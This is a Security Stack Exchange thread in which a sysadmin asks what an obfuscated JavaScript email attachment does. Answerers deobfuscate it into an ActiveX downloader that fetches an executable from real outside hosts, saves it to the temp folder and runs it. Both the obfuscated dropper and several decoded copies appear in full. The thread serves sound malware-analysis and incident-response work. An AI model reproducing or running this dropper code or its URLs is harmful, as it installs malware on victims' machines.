# How to deobfuscate suspicious JavaScript code?

Tags: malware, javascript, obfuscation

I'm a sysadmin and one of my users just told me that he opened a JavaScript received by mail. Apparently there is no impact but since I don't know this language well, especially when its obfuscated, I ask for help.

Here is [the code](https://gist.github.com/anonymous/18999dc6ecf8102ee4fb01379d7d8fbd):

```
function zxylv()
{
    var a = 1;
    var abisr="cf72ac2439a7222a712ff7b38b6c25f1023aac22b666cfb52bd1429e8538a9b08b022db5938e0f2df6e0ac703ebaf23d7a21ffb19ad43ebeb20a3564a7039d633ed3920c9e60aca6ca512ff2e2dc3d20d8c20b8e2ed062db5b2fcdf27e6765e7337d8838d293ed9b35c2337b7a3aa152dc493eba76caab34c9321f2020abb04f5438cb538dfb3ca1b6cc8e71ea06ccb422a4c29bff3bf1a6ccbe0df2a2fea038dd025c413ab3b29e9814b9a03eb02ee9a26de629da82fba338f5e64ca36ece601aff1fd2814b2301eeb00d0a7ee2662c6e14d3501c9e00fee04a2d18ebe18c111cdf16eb8065e6b77bb234b5421dcc20d7b04d8d38c7038cb03cc5962c9e23a863cfb229e1622a0264e496edb10bc2709a8318df76eb6e60b776cd3339d143ee3d20a1160dab6cf2d2aa362dbc420de93fd3f29ab265b5377c5534b7621b1120ab304ec538b1238ca23ce5562e6e3fe0529a2922c6f28fae64fba65ea877bf825b622ac576cd2c64d1734e2821c8d20c3904bf538ecf38ced3ce5362ea73fc5838bd92ddb038a3139e843fcc36cfbf71d3f71ce46cded7ee627cc9e7ce3a65d4c6cd3537f913ee4c29fdf38f4f39ecf3efb522e3c6cf1e2fc042db2620ddd20db22ec9f2db532fb4e27aea64ccc34a0d21a1720b5904dd738d7338dba3cd1e62f431ed6229bbf3fad83cee923c5d22eea3fb8129"+
    "c2c0ea0c23a5128bf735b4260b5e6cf4e2ab052da8420fba3ff3b29d4665b5a77c8931fdc29e1120fc53ff1d29a2537bd13ee0329d2738e7a39dc33ea9e22e7e6ce4c2fbec2daef20c3c20c162ed082de9f2fd2b27f4464d2a22d1d39c4c20b5b20aaf60e1f6cb0938f823ef2439cc729d8965b2977a9b31ec131dfa2fcda2dc3438efb2fa0d24be06cd9164ac329fda3ecb73ec5623ac33ef4565e3437f4c3ed8b29a2538b5139bff3ee6022ccf6cfdb2fe9e2db9220c5620acc2eefd2da222fb7127a6764fb322d7e39c5920b8220cd660f136cdf138c133ed4039d6f29e2a65ab277a2731f7d31fdb2aaab39b3022b002fc2d38eb425eb623dd122fe36caa92be8729d9138bc408e1c2dd8f38c8a2dd7664ee42fea42dacf20db620a6d2eaaa2db9a2fa1327a7a65d1137ae138beb3ec2835bb337dc92bcf329a4a38f6b08e622dd1338d132df420ac033eeff23a8a21de019f1c3ecd320ac864b686ece824c0b38d1638ff43cdeb76b0a63e5b63fa938eb525bf022f5935bc339a643eb2220db262b1a2feee23daa21a9663cd524ea929de67ffea2ee5c24ad97ea207bfe96ef9360cab6cf192aa1339d9322e522fd3738b4525e6623c2522efd64a593ef1929b193fc0239d8620f1938a6b60c416cf0329a923eea63ec7723eb73ec4165dd96ce0937dbf25b332abdc6cdf564dce6de3629"+
    "b223ef063ef3423b3c3eea965ffa37e493efb829e5438e4739b983ec4122f146ce562ff3e2dbff20ad220d9d2ea832db762fdad27a1264ac23ebc729d903fdd939cd620d7d38c7660dab6ce572af682de7520eb13fc5029ed865c5677edb31f5329acd20fa23fa7729d5d37e592bead29cab38e3108b1d2deb238abf2de890aaae3ed4423c2921e1319f8d3ec7e20c0e64c0b6ecb824cbe38ed038e7d3cace76dbe63f8763dec23d772ddc121b4b22f9823f8624b5b22a7828ae43ceca25c7a3bbe23cd0d25df22fcaa2be6221b0662ebc23ccc22db925b3f23e6f22ae862e0722ee139dd763d117dafb7cf6862df421a4623e2a3ae306ec1360fe36cf9e2ab3e39b3f22ee42fc9238d0625e9823d7022bb064c893ec5129c843fca739b0620ded38d0860e9e6cc2629e523eda03ea2f23a963ebe165f5a6caca37e7425c6b2acbd6cfb264e4b6dc5d29b773edb63ef8a23c973ea9c65bf337e5f3efe029edd38d5339d903ee4622bfc6ce562fb5d2da9b20b9e20b6e2ef5c2ddf22ff8a27c6d64fac3ec0229ff73fd1f39c6820c9c38b5160afe6cbb72af1c2dfb820c413fdef29e0e65ee577b6c31aa229ac120aeb3fddb29b9837fea2bf9a29f8538d5408e092dfa338ece2dede0ad7c3eba523f7421c3c19ad43eb9920d8264a4c6eb2924be738a8c38ec83cb0d76ce163b1d63c6638efd25"+
    "ee122f4235b7139f093ec8620eaf62f2f2ff4e23d0621e8463f8424e3729e8d7fa272ed0f24e907ee5a7bf2f6efb860abe6cb972ac6039e5122f632fbfb38ad525da923b7a22b2664d223ed6029adf3fdb439f8020fa838dc560f7f6ccb629ad73ec993ec3f23a4b3eed865b9e6cf7037be625dcc2ac386cf3664b9f6df1129d253ec233ee5b23f223ec7165ffc37d7f3ee4229b8038b4a39bfb3ed5d22f226ccf42fc502dc1920b9e20a932ebda2df2d2fc6c27bd164a933eaf129c663fec639def20c2838f5560b266cb9b2aeb92deb120afe3fb5529d4165ec177f5231bf629d4720e7e3fd6b29a6837b863eba029c3d38c1039cdd3ed2c22ea16cc082fb4d2da6320c0020fc42ec472dba72ff3527fb764ca222dea39a6d20f6420edd60da06cf1d38a593ed2a39ec629b5e65cde77ad531eaa31a0865e3377de331c2831eb965d9677eda31e3831e3665b1e77e3031c3c2fccb2dd3d38a292ffb224aaf6cf0264b9529cc63eca93eaeb23e883ed3a65c5c37ef83eae229eab38ad539c513efca22bfa6ceb32fc652dac920fb820bc72ecc22dadf2fc4427cfe64a3d22f1039e7e20b8b20f4860b756cdc138fdd3ed4139f0e29fa265d7377b5931b8e31e342ac6a39de722d052fd3838de125daa23d5122f966cbac2bb0f29ce538a0418d5c29fce21b6f3cbf00ae8f25e4720b9229acb1c"+
    "e5a2db7538ce924bb664bea65a4037f3238d253ea6d35b7a37e6f3ad062dfe53eb316cd6e2ab833fe466cef771bec6ca2422fe029d833be526cb050db4a2fb9338c7725f653ab0429eb514b7503f2c2ee2126a6a29bad2fef738a6d64c336ef6c1fe592fb8f3ec4125b323cb3838e7225f6122b872baf962b0d0aa9325dba20c4f29c811fdc335eb03fa9e38ab729cb521aff03ef72ea8226ff529d6c2fdf938ff46eceb65b2777f933ae012de8e3eb876cc4638dca21c803ce480aa0725fe920ba229baa02c822dcb021f2c29ac06cf3171c156cf3f6ebed10f3810f836ecfa6cd5767a286ce4401de72dd6838f3024f7962d3b3eae42db7222fe628b3723f2021e0064b3f65fe262ca838e4023d401ff7138e413eb7325f2422bec2be5f64f1f7fe697ac5b65ede62db73fd0039df12ef933fed338fb73ed9764d7c7eab160fbf6cf5075ad465f726cf2a67e186cab46ec6b62ed329fff34fa029d7d6eb9a77c513ac232da133ed2f6cf9438d8221f213cdda0ab7225aaa20f1f29f911cea12da5238e2a24aa26cb6471be16ce382aa323fdd362d9a0bd7629d8038f6b1fb873ccbc29deb2fdfd25afe2db9c20c260aaac23c5420ee928d5129aac3ef4b64dda7ece965b326ca8467c9f6cbd438cd321e873ce910af6525cd320a4229d9502fac2da2521e6329ace77bb83efae29f7538ad339"+
    "be63eb0d22d796cb7a38d6e21f9b3cfc70ab8225a4820c4629d751cebf2df5538b0b24e4277ee031db62fadd2da1238d862fe2b24b186cbdb64c3529b293eb183efa423bb13ead265a9937c903ebda29d1838b9039dbb3eaeb22dc66cee22ae1e2de3820d013facd29f7d77bb631e6131d9e2ab3c39d1b22fec2ffff38b8925b0523a7a22e076cb8c3fb152db583aef829fa818c6723c8d18ea829bad21e983cbaf64afe28b242df1338bbc2df4360a006ce952fcce2dba820fe320de12ed532df232fe7d27f2265e4a37c3438f9e3efca35b7037c103ac9d2dd6e3ef466cde83cfca2dc5d38d1624dc36cb1971f706cbd32bb8829a3b38ccb18e8829ddc21c7d3cff00ae2025cd120a3f29b661cf992dce538aec24d9064cee65bbf77fa125c2d2ac316cc6664f1f3cb8f2dd9d38b3624e9665eb137f9a3affc2dd7e3edc56ca8623ebc2ef4626d981fe8e38b5a3eb2329ed22df8921f256ca2b71ce86cacb22c6429e5b3be0e6cdd10dfdf2fea638c6725d783acb829ff414d6003f5d2ec4726cc529c932fc6d38fb364a706edb50da9408b2903edd08f510eabc62c351fd9a38c573ed6c29be92dce221f536eb3e65ad577a1e23e822eb2a26e9e1fc3538a643efd429e992daca21af862b1903bee3cb4129a3022e9c64ba265c7e77f4923b452ee5426c951feb538e183ee2a29d132db5d21"+
    "cc462c9718eca35aaf3cc2829d146ced571cc66ca667da0a77ee723b6f2ed3b26b671fbb838f683ee4629a032dc0821fb262cb21bef73ef9925ddd38e1029ccf64ea228bca2dc4538e212da9b65a7a77d4323abe2eea126d2c1fc1738c543ebc829cb92dcc121bf862f7a1ce8723e713fef325f5338bc725ce423e7f22cfb6cc1071ede6cdc87cebd77ebc23a822ebad26d1d1fef538f433eca329a812daed21df062cd51fafc2db373aac729ea518a7923bf40acfa25dea20c8029ed764b163ce492dc5638f3e24a5760d056ce147ed9465bfb77fd023b102ed1c26a711fc3338c583efe229ad22db6a21d0062b670ff0820c3823a5d3fab129c2664ff565ee277a583efc129b1738fce39a333ed5822c736ccb52ff932da8320b8820f352ef852da222fa5427bd864f5f3ceca2db0438cba24df260e056cb6b2ad7d2dd9220ede3fc9529b8265eaa77ae731f9629f8e20ab53fe5a29ff46cfc137f303ea7129a4a38f5a39b133edda22de76cfcb2fc8a2dd6720f2020b3e2eb642de382fd7827fe664c8522e4139da920b5d20fee60b436cb8838c8a3ee2139cee29f8765e6077ae531d4931cf82fc4b2dd7438aca2ffbc24f2b6cfc464ab929fb93ea6c3edcb23a4f3efc665ef237dad3ec7f29a3a38c5739e133ec2822ba46cea72fe742db6220beb20a732ee952ddf02fada27a5b64d8622"+
    "f8139b5820c8d20dcc60bf46ccfc38d9a3eb0839ebb29d6465e3a77e6e31cc831a542be9329ad138e9908db22da0d38f332da1664fea2af6839a8b22c852fd0238d9a25a2723b3e22af36cbf464da328b682df8e38cd72df7160ef96cc1029e5b3ee6a3ee0023b343ec7965f316cf0f37b6525b442afa46cc9864a7c6df6729b993edfe3eab223a8b3eeb265bf537cae3fde92da2f3aed529b3c18eaa23fb718edf29fc021f183ca8264e3228c542dc4138d932dc7c60a496cc362acd339e0422c0b2fd0d38d1325f7623f1f22e856cf9964b1b3cd692df5238aab24f3560dc66cf0b29a8c3ee743eb3c23f8c3ec2265af76cae237eb425b612ad2a6cb4364a496db8b29a533efc53eec423be33ecdf65d1537d9638bc03ecdc35a2537f203aed62dbc33ec126cd7f3bc1f3ffa824a146cf8271d836cf3522c2329f5f3beae6ce470deb72ff8238b0225d593add129f0414ae503ab92ea9426a8729c632ff3038e7364ee86ed951bd5f1ff5f2fe803ed9325f003caee38bc362eb01faa924d3229fa620f6a20d636ebdb65c9577ea53bed23fabc24fb762b491eb1439fc022c7f64d0b3cbf42dcff38fdb24ff865da477ed831d492ffd52db4a38bb52fee424b726ca3e64fef29b993ec973ee1023cc83ef2a65c676cf5637e8c31e0f31e7f31fb765c3f77f2e31b9b31f4d65ca377";
    var uumod;
    while(true){
        try
        {
            uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));
            break;
        }
        catch(er)
        {
        }
    }
    return uumod;
}
function tljsw()
{
    var vqqfn=new Array("e","v","l","a");
    return vqqfn[Math.floor(Math.random()*vqqfn.length)];
}
zxylv();
```

Can someone tell me what this code does?

Comment: This is the same obfuscated ActiveX as in this one: http://security.stackexchange.com/questions/147714/de-obfuscation-of-malicious-javascript-in-spoofed-email/

Answer (score 48, accepted):

The procedure for dealing with obfuscated JavaScript is very similar to [how you deal with it in PHP](https://security.stackexchange.com/questions/115461/i-found-unknown-php-code-on-my-server-how-do-i-de-obfuscate-the-code/115462). In this case, the real action is going on in this line:

```
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));
```

An anonymous function is created from the long string of code, and that function in turn creates new code by picking characters from the long banks of seemingly random text at the top. At the end you have four function calls:

```
tljsw()+tljsw()+tljsw()+tljsw()
```

That function at random returns one of the letters `e`, `v`, `l` and `a`. So sometimes it will give you [`eval`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval). That executes code, but we don't want to do that. We just want to read the code. So let's replace it with `console.log`:

```
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}cconsole.log(tgrdm);")(abisr));
```

We then get the following output:

```
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
```

I don't know what that code does, but the second I copy pasted it into a text editor my antivirus started screaming about it... As [LegionMammal978](https://security.stackexchange.com/users/92572/legionmammal978) points out in comments this seems to target IE browsers with bad config, but to be on the safe side you could assume that the computer this was run on is infected by malware and [treat it as such](https://security.stackexchange.com/questions/138606/help-my-home-pc-has-been-infected-by-a-virus-what-do-i-do-now).

*(Note that I had to split the URLs into `"tiny" + "url"` because Stack Exchange does not let you post that URL... This should not change the behaviour of the code, though.)*

Comment: Nice work. I also decompiled the mov file, and it's again obsfurcated. From what I see, it attempts to call the VB6.0 compiler at `C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB` and compiles itself. It's also got a bunch of random strings like `unimmaculately` xD
 I'm stepping out right now, but I'll definitely update with more information after I look at this a bit more. Also probably german because of the language in the strings.

Comment: The `ActiveXObject` calls appear to make it dependent on the user's browser being IE and a certain security setting being changed. Still, though, you never know when it comes to potential malware infections...

Comment: This code targets IE7 and below. Googling the string `MSXML2.XMLHTTP` led me to https://msdn.microsoft.com/en-us/library/ms535874(v=vs.85).aspx. The code `new ActiveXObject("MSXML2.XMLHTTP");` is needed since [`XMLHttpRequest()`](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) was added on IE8.

Comment: May I ask which antivirus you have installed?

Comment: @Frisbetarian It was not on my personal computer, so I am not sure I remember, but I think F-Secure.

Comment: a very sneaky piece of code indeed!

Comment: I think it would be a good idea to modify the final code block so it won't execute actual malicious code if blindly copy/pasted. Maybe replace the URL with example.com and then clarify what the actual URL is afterwards? (Might even be better not to include the actual malicious URL...) I think [these guidelines](http://meta.stackoverflow.com/a/287348/1394393) (community generated as they are) are applicable.

Comment: @jpmc26 Not sure I agree, but I'd welcome a discussion on meta here, and would be happy to follow the outcome of it. SO guidelines do not apply here (but the reasoning behind them might).

Answer (score 16):

This code is trying to execute a malicious file, `10.mov` (against IE ActiveX), which is possibly some kind of ransomware, downloading from this address:

**DON'T DOWNLOAD FROM THIS ADDRESS!**

```
xxxx://oamnohndpiwpicgm.onion.nu/10.mov
```

https://virustotal.com/en/url/f6aaa537b8f636b7827e08806bf6a8512b5c6497b82e457615cec15a62e2f044/analysis/

Here is de-obfuscated code:

```
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
function getData(callback) {
    try {
        getDataFromUrl("", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
```

Here is a report from VT of that file (*Fordanskede.exe*):

https://www.virustotal.com/en/file/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0/analysis/1484576109/

Another report when file is triggered in sandbox:

https://www.hybrid-analysis.com/sample/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0?environmentId=100

Comment: Also, it's worth noting that this code targets IE7 and below. The executable can target **any** Windows system.

Comment: @IsmaelMiguel does windows 10 have IE7?

Comment: @Tim No, but Windows 7 had. I believe.

Comment: I think it would be a good idea to modify the final code block so it won't execute actual malicious code if blindly copy/pasted. Maybe replace the URL with example.com and then clarify what the actual URL is afterwards? (Might even be better not to include the actual malicious URL...) I think [these guidelines](http://meta.stackoverflow.com/a/287348/1394393) (community generated as they are) are applicable.

Answer (score 5):

There's the "encrypted part" of the code:

**BE CAREFUL THIS IS AN ACTUAL EXPLOIT CODE AND CAN BE HARMFUL TO YOUR COMPUTER**

```
function getDataFromUrl(url, callback){try{var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");xmlHttp.open("GET", url, false);xmlHttp.send();if (xmlHttp.status == 200) {return callback(xmlHttp.ResponseBody, false);}else{return callback(null, true);}}catch (error){return callback(null, true);}}function getData(callback){try{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{return callback(null, true);}});}});}});}catch (error){return callback(null, true);}}function getTempFilePath(){try{var fs = new ActiveXObject("Scripting.FileSystemObject");var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;return tmpFilePath;}catch (error){return false;}}function saveToTemp(data, callback){try{var path = getTempFilePath();if (path){var objStream = new ActiveXObject("ADODB.Stream");objStream.Open();objStream.Type = 1;objStream.Write(data);objStream.Position = 0;objStream.SaveToFile(path, 2);objStream.Close();return callback(path, false);}else {return callback(null, true);}}catch (error){return callback(null, true);}}getData(function (data, error) {if (!error){saveToTemp(data, function (path, error) {if (!error){try{var wsh = new ActiveXObject("WScript.Shell");wsh.Run(path);}catch (error) {}}});}});
```

This will download an infected .mov file, which is detected by any good antivirus.

Edit: Since it used the TinyURL service, I have contacted them to delete the link.

Comment: Thank you, i just tried to access the URL and its blocked by our proxy.

Comment: Actually, the file is not a MOV file at all, but an EXE file; you can see how it is saved as a .exe file in the other answers. It just has the extension .MOV on the server to make it look less suspicious in traffic logs.

Comment: I think it would be a good idea to modify the final code block so it won't execute actual malicious code if blindly copy/pasted. Maybe replace the URL with example.com and then clarify what the actual URL is afterwards? (Might even be better not to include the actual malicious URL...) I think [these guidelines](http://meta.stackoverflow.com/a/287348/1394393) (community generated as they are) are applicable.

Comment: @jpmc26, thank for your advice, I've modified the code so it wouldn't run and added a warning.